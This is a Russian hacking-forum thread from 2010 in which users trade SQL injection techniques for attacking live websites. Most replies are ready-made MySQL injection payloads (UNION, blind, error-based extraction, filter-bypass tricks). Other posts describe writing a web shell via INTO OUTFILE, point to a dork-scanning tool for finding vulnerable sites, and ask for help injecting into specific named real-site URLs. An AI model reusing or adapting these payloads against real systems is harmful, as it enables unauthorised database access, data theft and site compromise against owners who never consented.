28.09.2010, 17:22
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 24
Провел на форуме:
60954
Репутация:
3
|
|
Redwood, я понял. С шеллом не получилось. Но вот, что известно:
Инъекция в числовом параметре есть:
http://site.com/menu/show/121%20and%201=1/33/#main
Результат:
A Database Error Occurred
Error Number: 1054
Unknown column '20and' in 'where clause'
SELECT * FROM menu WHERE id=121%20and%201=1
Фильтруются пробелы, символы : ( , ) , /**/, +
Можно ли раскрутить скуль в таком случае?
|
|
|
28.09.2010, 19:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
подзапросы + join
|
|
|
|
28.09.2010, 19:51
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 24
Провел на форуме:
60954
Репутация:
3
|
|
Сообщение от Digger
пробуй POST'om
Это через программу? как бы я так понимаю я итак делаю post'om через браузер
Сообщение от Strilo4ka
подзапросы + join
подзапросы не помогают, потому что фильтруются даже скобочки в самой url
|
|
|
|
28.09.2010, 21:54
|
|
Познающий
Регистрация: 10.09.2010
Сообщений: 49
Провел на форуме:
15807
Репутация:
5
|
|
что делать если union и select в связке фильтруются
|
|
|
|
28.09.2010, 22:09
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от LBC
что делать если union и select в связке фильтруются
Подзапросы, крутить как слепую, вывод в ошибке
Код:
sql.php?id=2+union+(select+1,2,table_name,4,5+from+information_schema.tables)
and etc
Код:
sql.php?id=2+and+(select+ascii(substring((select+table_name+from+information_schema.tables+limit+0,1),1,1))+from+information_schema.tables+limit+0,1)>66
and etc
Вывод через ошибку без использования Union
Для Mysql 4.1>=
Код:
sql.php?id=2+and+(select+1+from+(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)
Код:
sql.php?id=2+or+1+group+by+concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+having+min(0)
Для Mysql 5.1>=
Код:
sql.php?id=2+and+extractvalue(1,concat(0x5c,((select+table_name+from+information_schema.tables+limit+0,1))))
Для Mysql 5.0.12 > 5.0.64
Код:
sql.php?id=1+or+(1,2)=(select*from(select+name_const((select+table_name+from+information_schema.tables+limit+0,1),1),name_const((select+table_name+from+information_schema.tables+limit+0,1),1))a)
Можно еще попробовать обойти так
Код:
sql.php?id=2+un/**/ion+se/**/lect+1,2,3,4,5
Код:
sql.php?id=2+un/*%00*/ion+se/*%00*/lect+1,2,3,4,5
Код:
sql.php?id=2/**/union/**/select/**/1,2,3,4,5
Код:
sql.php?id=2+union+%0A+select+1,2,3,4,5
Вариантов куча, всего не перечислишь, думаю этого должно хватить
|
|
|
|
28.09.2010, 23:57
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917
Репутация:
17
|
|
Кто знает софт(скрипт) который в гугл лезет по моему дорку, подставляет в URL ковычку и сайты где вышла ошибка передаёт мне?
|
|
|
|
29.09.2010, 07:03
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от -PRIVAT-
Кто знает софт(скрипт) который в гугл лезет по моему дорку, подставляет в URL ковычку и сайты где вышла ошибка передаёт мне?
http://zalil.ru/29741714
|
|
|
|
29.09.2010, 20:57
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
Провел на форуме:
71852
Репутация:
0
|
|
Нашел вот такую вещь
Код:
id=1+limit+1+into+outfile+'/path/to/shell.php'+fields+terminated+by+''+optionally+encl osed+by+""--+
Что-то я не пойму откуда берется шелл чтобы залить его в /path/to/ ? |
|
|
|
29.09.2010, 21:00
|
|
Новичок
Регистрация: 25.11.2009
Сообщений: 0
Провел на форуме:
68379
Репутация:
0
|
|
Сообщение от cipa21
Нашел вот такую вещь
Код:
id=1+limit+1+into+outfile+'/path/to/shell.php'+fields+terminated+by+''+optionally+encl osed+by+""--+
Что-то я не пойму откуда берется шелл чтобы залить его в /path/to/ ? Так вот оно: ""
Можешь на свой код заменить...
|
|
|
|
30.09.2010, 12:39
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Привет подскажите плиз как оборвать запрос на данном сайте
http://allkupchino.ru/miss/miss.phtml?n=46{SQL}
http://allkupchino.ru/bbs/ob.phtml?nb=42{SQL}
Если подставить (+; --+; /*) то результат не выводится, значит ошибка = (
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
